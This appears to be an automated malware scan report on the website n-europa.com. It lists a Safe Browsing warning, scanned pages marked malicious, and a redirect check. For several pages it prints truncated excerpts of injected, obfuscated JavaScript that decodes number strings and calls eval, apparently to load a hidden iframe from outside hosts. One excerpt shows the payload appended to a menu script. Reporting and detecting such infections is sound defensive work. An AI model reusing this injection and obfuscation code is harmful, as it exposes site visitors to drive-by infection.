Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=n-europa.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://n-europa.com/ | 200 OK Content-Length: 10491 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://n-europa.com/modele.php?page=accueil&numlang=1 | 200 OK Content-Length: 20379 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,156,157,162,175,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,156,157,162,175,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,151,162,150,145,162,176,145,62,150,151,63,155,162,147,160,171,150,151,63,147,160,157,62,164,154, Antivirus reports:
| ||
http://n-europa.com/js/preload.js | 200 OK Content-Length: 11641 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sp="split";aq="0"+"x";w=window;ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,69,6b,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5e,67,24,63,60,65,5b,65,5c,69,25,58,6b,26,56,6d, Antivirus reports:
| ||
http://n-europa.com/js/calque_defilant.js | 200 OK Content-Length: 12105 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sp="split";aq="0"+"x";w=window;ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,69,6b,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,5e,67,24,63,60,65,5b,65,5c,69,25,58,6b,26,56,6d, Antivirus reports:
| ||
http://n-europa.com/modele.php?page=accueil | 200 OK Content-Length: 18587 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,156,157,162,175,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,156,157,162,175,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,151,162,150,145,162,176,145,62,150,151,63,155,162,147,160,171,150,151,63,147,160,157,62,164,154, Antivirus reports:
| ||
http://n-europa.com/modele.php?page=quinous | 200 OK Content-Length: 18684 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,156,157,162,175,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,156,157,162,175,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,151,162,150,145,162,176,145,62,150,151,63,155,162,147,160,171,150,151,63,147,160,157,62,164,154, Antivirus reports:
| ||
http://n-europa.com/modele.php?page=projets | 200 OK Content-Length: 33516 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,156,157,162,175,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,156,157,162,175,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,151,162,150,145,162,176,145,62,150,151,63,155,162,147,160,171,150,151,63,147,160,157,62,164,154, Antivirus reports:
| ||
http://n-europa.com/modele.php?page=intervenants1&numgroupe=1 | 200 OK Content-Length: 20000 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,156,157,162,175,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,156,157,162,175,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,151,162,150,145,162,176,145,62,150,151,63,155,162,147,160,171,150,151,63,147,160,157,62,164,154, Antivirus reports:
| ||
http://n-europa.com/js/menu_deroulant.js | 200 OK Content-Length: 10492 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function expandCollapse(numero) { strID = "ID" + numero; objElement = document.getElementById(strID); if (objElement.style.display == "none") { objElement.style.display = "block"; } else { objElement.style.display = "none"; } } function cancelBubble(netEvent) { if (document.all) { window.event.cancelBubble = true; } else { netEvent.cancelBubble = true; } } ;i+=1){j=i;if((0x19==031))if(e)s=s+ff(e(aq+(w[j]))+0xa-01);}za=e;za(s)} Antivirus reports:
| ||
http://n-europa.com/modele.php?page=intervenants2&numgroupe=2&contraction=1 | 200 OK Content-Length: 38409 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,156,157,162,175,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,156,157,162,175,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,151,162,150,145,162,176,145,62,150,151,63,155,162,147,160,171,150,151,63,147,160,157,62,164,154, Antivirus reports:
| ||
http://n-europa.com/modele.php?page=reperages | 200 OK Content-Length: 36218 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,156,157,162,175,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,156,157,162,175,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,151,162,150,145,162,176,145,62,150,151,63,155,162,147,160,171,150,151,63,147,160,157,62,164,154, Antivirus reports:
| ||
http://n-europa.com/modele.php?page=reperage_liste&idcategreperage=10 | 200 OK Content-Length: 38430 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,156,157,162,175,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,156,157,162,175,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,151,162,150,145,162,176,145,62,150,151,63,155,162,147,160,171,150,151,63,147,160,157,62,164,154, Antivirus reports:
| ||
http://n-europa.com/modele.php?page=reperage_liste&idcategreperage=36 | 200 OK Content-Length: 41077 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,156,157,162,175,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,156,157,162,175,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,151,162,150,145,162,176,145,62,150,151,63,155,162,147,160,171,150,151,63,147,160,157,62,164,154, Antivirus reports:
| ||
http://n-europa.com/modele.php?page=reperage_liste&idcategreperage=15 | 200 OK Content-Length: 38124 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,156,157,162,175,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,156,157,162,175,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,151,162,150,145,162,176,145,62,150,151,63,155,162,147,160,171,150,151,63,147,160,157,62,164,154, Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: n-europa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Jan 2015 08:58:29 GMT
Server: Apache/2.0.55 (FreeBSD) PHP/4.4.2
Content-Type: text/html
X-Powered-By: PHP/4.4.2
GET / HTTP/1.1
Host: n-europa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 16 Jan 2015 08:58:29 GMT
Server: Apache/2.0.55 (FreeBSD) PHP/4.4.2
Content-Type: text/html
X-Powered-By: PHP/4.4.2
Second query (visit from search engine):
GET / HTTP/1.1
Host: n-europa.com
Referer: http://www.google.com/search?q=n-europa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: n-europa.com
Referer: http://www.google.com/search?q=n-europa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.